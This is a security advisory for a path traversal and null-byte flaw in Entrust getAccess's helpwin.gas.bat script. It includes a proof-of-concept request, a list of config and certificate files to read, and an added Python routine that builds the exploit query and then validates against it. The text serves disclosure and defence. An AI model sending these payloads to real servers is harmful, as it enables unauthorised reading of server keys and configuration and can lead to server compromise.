Good Morning Listmembers,

this is another posting (see the first one here: http://www.securityfocus.com/bid/3109) about Entrust's "getAccess[tm]" product.

Problem Description:

"getAccess[tm]" (still) uses default shell scripts which start Java classes for its web applications. Due to missing input validation it is possible to read files with getAccess's permissions on the "getaccess" machine (this only works in combination with other input fields, as described below). In connection with config and other files this can lead to a total server compromise (don't ask me how :-).

POC-Example:

A HTTP request to

  http://getAccessHostname/sek-bin/helpwin.gas.bat?

with the following parameters:

  mode=
  &draw=x
  &file=x
  &module=
  &locale=[relative FILE/PATH][Nullbyte/0x00][Backslash/0x5c]
  &chapter=
  ...

will lead to disclosure of [FILE/PATH].

Config file list (depends heavily on the config; the files can be found two traversals back [../../]):

/config/acl-runtime.conf
/config/administration.conf
/config/applist.conf
/config/authmethod.conf
/config/clientCert.conf
/config/connection.conf
/config/directories.conf
/config/domainAuth.conf
/config/hook.conf
/config/license.conf
/config/log.conf
/config/login.conf
/config/misc.conf
/config/pmda.conf
/config/redirection.conf
/config/registry.conf
/config/serverCert.conf
/config/serverConnection.conf
/config/source_systems.conf
/config/version.conf
/config/serverReq.pem
/config/serverCert.pem
/config/certs

Summary:

object: helpwin.gas.bat (cgi shell scripts)
class: referring to OWASP-IV (Input Validation Classes)
  Directory Traversal (IV-DT-1) http://www.owasp.org/projects/cov/owasp-iv-dt-1.htm
  Null Character (IV-NC-1) http://www.owasp.org/projects/cov/owasp-iv-nc-1.htm
  Meta Character (IV-MC-1) http://www.owasp.org/projects/cov/owasp-iv-mc-1.htm
remote: yes
local: ---
vendor: has been informed with a separate e-mail (security@entrust.com / entrust@entrust.com)
patch/fix: is already available and will be posted by Entrust here today.
recommended fix: sanitize meta-characters from user input

personal remark: using shell scripts for security-related software has always been dangerous!!!

nice day,
rC
security@freefly.com
rudicarell@hotmail.com
http://www.freefly.com/security/

check out the brand-new Open Web Application Security Project: http://www.owasp.org
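As an added illustration (not part of the original posting, and not Entrust's code or fix), the following Python reconstructs the request layout the advisory gives and shows the kind of input validation the "recommended fix" line asks for. Everything specific is an assumption: the hostname-independent query layout follows the advisory's listing with the payload placed in the `locale` parameter as printed there, the help root `/opt/getaccess/help` is made up, the parameter names checked (`file`, `module`, `locale`, `chapter`) are the ones the advisory lists as path-bearing candidates, and the validator is a generic denylist-plus-allowlist-plus-canonicalisation check, not what the vendor patch does. The null byte is shown because a C-level string API treats it as a terminator, which is the usual reason a `0x00` in a parameter lets a caller drop whatever suffix the script appends; the advisory does not say what the trailing backslash does inside getAccess, so the code only rejects it.

```python
"""Added example for the getAccess helpwin.gas.bat advisory (not the vendor's code).

Builds the query string in the shape the advisory describes, then runs it
through a validator of the kind the advisory recommends (reject meta-characters,
allowlist the remaining value, canonicalise and confirm the path stays in root).
"""
import posixpath
import re
from urllib.parse import parse_qs, quote

# Assumed location of legitimate help files; the advisory names no such path.
HELP_ROOT = "/opt/getaccess/help"

# Parameters assumed to end up in a file path. Order is fixed so error
# reporting is deterministic.
PATH_PARAMS = ("file", "module", "locale", "chapter")

# Meta-characters named in the advisory (OWASP IV-NC-1 / IV-MC-1).
META_CHARS = (("\x00", "null byte"), ("\\", "backslash"))

# Allowlist for a single help-file component: no slashes, no leading dot,
# so ".." and absolute paths cannot pass (OWASP IV-DT-1).
SAFE_COMPONENT = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*(\.[A-Za-z0-9]+)?")


def build_poc_query(target: str, depth: int = 2) -> str:
    """Encode the advisory's layout: mode=&draw=x&file=x&module=&locale=PAYLOAD&chapter=

    PAYLOAD is depth x '../' + target + 0x00 + 0x5c, URL-encoded as %00 and %5C.
    'depth=2' mirrors the advisory's remark that the config files sit ../../ back.
    """
    payload = "../" * depth + target + "\x00" + "\\"
    params = [("mode", ""), ("draw", "x"), ("file", "x"),
              ("module", ""), ("locale", payload), ("chapter", "")]
    return "&".join(f"{k}={quote(v, safe='/')}" for k, v in params)


def sanitize_component(value: str) -> str:
    """Denylist the advisory's meta-characters, then allowlist the rest."""
    for ch, name in META_CHARS:
        if ch in value:
            raise ValueError(f"rejected: {name} in input")
    if not SAFE_COMPONENT.fullmatch(value):
        raise ValueError("rejected: not a plain file-name component")
    return value


def resolve_help_file(value: str, root: str = HELP_ROOT) -> str:
    """Return the canonical path for a validated component, or raise.

    The final containment check is belt-and-braces: even if the allowlist
    were loosened later, a value that normalises outside root is refused.
    """
    component = sanitize_component(value)
    full = posixpath.normpath(posixpath.join(root, component))
    if posixpath.commonpath([root, full]) != root:
        raise ValueError("rejected: escapes help root")
    return full


def check_request(query: str) -> tuple[bool, str]:
    """Validate every path-bearing parameter of a helpwin-style query string.

    parse_qs decodes %00 and %5C back into the raw bytes the script would see,
    which is exactly what a validator must inspect (not the encoded form).
    """
    params = parse_qs(query, keep_blank_values=True)
    for name in PATH_PARAMS:
        for value in params.get(name, []):
            if value == "":          # empty parameters are left to the script's defaults
                continue
            try:
                resolve_help_file(value)
            except ValueError as exc:
                return False, f"{name}: {exc}"
    return True, "ok"


if __name__ == "__main__":
    poc = build_poc_query("config/license.conf")
    print("PoC query :", poc)
    print("PoC check :", check_request(poc))
    print("benign    :", check_request("mode=&draw=x&file=intro.htm&module=&locale=en&chapter="))
    print("traversal :", check_request("file=../../config/log.conf"))
```

The denylist alone would have stopped the advisory's exact payload, but the allowlist and the containment check are what make the routine hold up against variants the denylist author did not think of (double-encoding, a traversal without the null byte, an absolute path); a practitioner patching a shell wrapper like this should apply all three rather than only stripping the characters named in the report.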